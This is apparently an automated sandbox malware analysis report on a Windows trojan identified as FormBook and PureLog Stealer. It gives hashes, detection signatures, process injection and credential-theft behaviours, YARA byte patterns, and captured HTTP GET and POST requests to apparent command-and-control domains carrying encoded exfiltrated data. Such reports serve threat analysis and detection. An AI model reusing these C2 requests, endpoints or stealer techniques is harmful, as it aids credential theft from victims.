Windows Analysis Report
dGHiTqj3AB.exe

Overview

General Information

Sample name: dGHiTqj3AB.exe (renamed because original name is a hash value)
Original sample name: 1f5c95d40c06c01300f0a6592945a72d.exe
Analysis ID: 1483009
MD5: 1f5c95d40c06c01300f0a6592945a72d
SHA1: 79a217ed19833efcf640ffd8bb04803e9f30d6f4
SHA256: 434ec59b680788bae7f2935200a77e681cecbb517d853c6e6cf31f4cf112e5cc
Tags: 32, exe, trojan

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • dGHiTqj3AB.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\dGHiTqj3AB.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
    • dGHiTqj3AB.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\dGHiTqj3AB.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
    • dGHiTqj3AB.exe (PID: 7792 cmdline: "C:\Users\user\Desktop\dGHiTqj3AB.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
      • fgebfePlJm.exe (PID: 2416 cmdline: "C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mcbuilder.exe (PID: 8180 cmdline: "C:\Windows\SysWOW64\mcbuilder.exe" MD5: CAE8E531CD82401A9ECB4C446CBB964B)
          • fgebfePlJm.exe (PID: 5580 cmdline: "C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7288 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2ec33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x1447f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source | Rule | Description | Author | Strings
0.2.dGHiTqj3AB.exe.72b0000.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.dGHiTqj3AB.exe.2cf513c.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
3.2.dGHiTqj3AB.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
                  No Sigma rule has matched
                  No Snort rule has matched
                  Timestamp:2024-07-26T13:58:07.135377+0200
                  SID:2855464
                  Source Port:49762
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:10.036735+0200
                  SID:2855464
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:35.005440+0200
                  SID:2855464
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:12.627565+0200
                  SID:2855464
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:56.269959+0200
                  SID:2855465
                  Source Port:49759
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:24.070738+0200
                  SID:2855464
                  Source Port:49749
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:16.188839+0200
                  SID:2855464
                  Source Port:49764
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:19.218798+0200
                  SID:2855464
                  Source Port:49765
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:56:15.151948+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49741
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:51.120537+0200
                  SID:2855464
                  Source Port:49757
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:48.598378+0200
                  SID:2855464
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:01.968155+0200
                  SID:2855464
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:27.994998+0200
                  SID:2855465
                  Source Port:49767
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:21.514806+0200
                  SID:2855464
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:56:46.525961+0200
                  SID:2855465
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:42.778805+0200
                  SID:2855465
                  Source Port:49755
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:26.659151+0200
                  SID:2855464
                  Source Port:49750
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:07.403866+0200
                  SID:2855464
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:37.598909+0200
                  SID:2855464
                  Source Port:49753
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:53.745534+0200
                  SID:2855464
                  Source Port:49758
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:29.248423+0200
                  SID:2855465
                  Source Port:49751
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:55:36.931527+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49735
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:21.796033+0200
                  SID:2855464
                  Source Port:49766
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:09.696547+0200
                  SID:2855465
                  Source Port:49763
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:15.383180+0200
                  SID:2855465
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:04.542850+0200
                  SID:2855464
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:40.170047+0200
                  SID:2855464
                  Source Port:49754
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  AV Detection

                  Source: Yara matchFile source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: dGHiTqj3AB.exeJoe Sandbox ML: detected
                  Source: dGHiTqj3AB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: dGHiTqj3AB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mcbuilder.pdbUGP source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000002.3492316310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: amWV.pdb source: dGHiTqj3AB.exe
                  Source: Binary string: amWV.pdbSHA256 source: dGHiTqj3AB.exe
                  Source: Binary string: mcbuilder.pdb source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000002.3492316310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fgebfePlJm.exe, 00000007.00000000.2188191018.000000000092E000.00000002.00000001.01000000.0000000C.sdmp, fgebfePlJm.exe, 00000009.00000000.2469561771.000000000092E000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2272383475.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2264431609.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: dGHiTqj3AB.exe, dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, mcbuilder.exe, 00000008.00000003.2272383475.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2264431609.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030AC410 FindFirstFileW,FindNextFileW,FindClose,8_2_030AC410
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 4x nop then xor eax, eax8_2_03099B20
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 4x nop then mov ebx, 00000004h8_2_03BB04E8
                  Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /sg0d/?r4HtI=inDHeTS0D6JHi&bPD=ZFII8SVAvGzgMmVXT4ZY+5svGFARRAPMY6hEAWMgzd/rbIPLPNZ+nr66isGJwkaWRyig0DUujo2cMsRd49nDMp6VdguE/ogC4VFXU40D/gpWgkUbHmnCm4E= HTTP/1.1Host: www.accelbusiness.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /x10g/?bPD=AtIpZIbrclbIO3wVVorP/+4YW7XwgThFYZcx/yn27KMXet/sCHbTQiCzWIx6Kv/NnE9nJScnuF31JPyJpxVQ15qsd8YhwJ4GP0n6fMl4YdtRcYZTZezTcHY=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.bosonserver.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /5gvb/?r4HtI=inDHeTS0D6JHi&bPD=/cc9D7vqfViixqGthyicdvN6zULLmywOC8ezpB4FmcTpRtjTbyPN+qyyn2oVZVAAZJsSw+aEzq+oGUOxhiKfxK7cUWDoBkvPGfZgrhOxmX7AStJyIMBk2Ik= HTTP/1.1Host: www.hourglasspoise.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygayReM86N3bYDrSkNDIFOCHTFVOdGC1q9B2gGW6d9vv3KfEEgs=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.asymtos.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /ukrf/?bPD=F/tpX3aJNzQcZIorwLh3+lvUFPUZ/CrYoWsqF027uxYn9zYWtTXD7TxpBDgZUhfyO+VwBO4Do9/nXXxf/u2OALcIo7otd0ARGQzWw/PbAY7nMJoOO6tnPWI=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.lontos.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /6fdz/?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.theiconsummit.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /5pdf/?r4HtI=inDHeTS0D6JHi&bPD=Ej/EzQPepC1y7H/CB3fFjxmxT5K/uokQyhXQpBVK3nqnb8oYKZIShVAN8OJA1iYy8omWkznWlYUMQWoQrGGIZe4YpIxUtk1QZkVuvgrHNfuUWu/hH7rCDC0= HTTP/1.1Host: www.accessoriestechbd.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficDNS traffic detected: DNS query: www.accelbusiness.net
                  Source: global trafficDNS traffic detected: DNS query: www.bosonserver.net
                  Source: global trafficDNS traffic detected: DNS query: www.hourglasspoise.net
                  Source: global trafficDNS traffic detected: DNS query: www.asymtos.tech
                  Source: global trafficDNS traffic detected: DNS query: www.lontos.top
                  Source: global trafficDNS traffic detected: DNS query: www.theiconsummit.life
                  Source: global trafficDNS traffic detected: DNS query: www.accessoriestechbd.com
                  Source: unknownHTTP traffic detected: POST /x10g/ HTTP/1.1Host: www.bosonserver.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 200Cache-Control: no-cacheConnection: closeOrigin: http://www.bosonserver.netReferer: http://www.bosonserver.net/x10g/User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Ascii: bPD=NvgJa+SucRLEOHANZpfT0s4TR7rn0SoTfJh/nDv4w4RqRpT5IGKVdh/eV9pXJKiN4iMkXB8np1iLJvOm221m0tTrP8cy4ZgLA3+ueO1DY9RKaYYIVcOiDXotuUeec3z0qAp0vnXLyYgQ26A611fOvnQ0G7e7IHQFeZG/yGuIHEFY2tdJ+ffxsVT8iK/BU1ss0g==
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 26 Jul 2024 11:58:15 GMT Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requ
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Fri, 26 Jul 2024 11:58:27 GMT Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requ
                  Source: fgebfePlJm.exe, 00000009.00000002.3492695958.0000000000B67000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.accessoriestechbd.com
                  Source: fgebfePlJm.exe, 00000009.00000002.3492695958.0000000000B67000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.accessoriestechbd.com/5pdf/
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757032878.0000000005630000.00000004.00000020.00020000.00000000.sdmp, dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: mcbuilder.exe, 00000008.00000002.3493562644.00000000047CA000.00000004.10000000.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3493242754.000000000320A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://asymtos.ai/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETyga
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
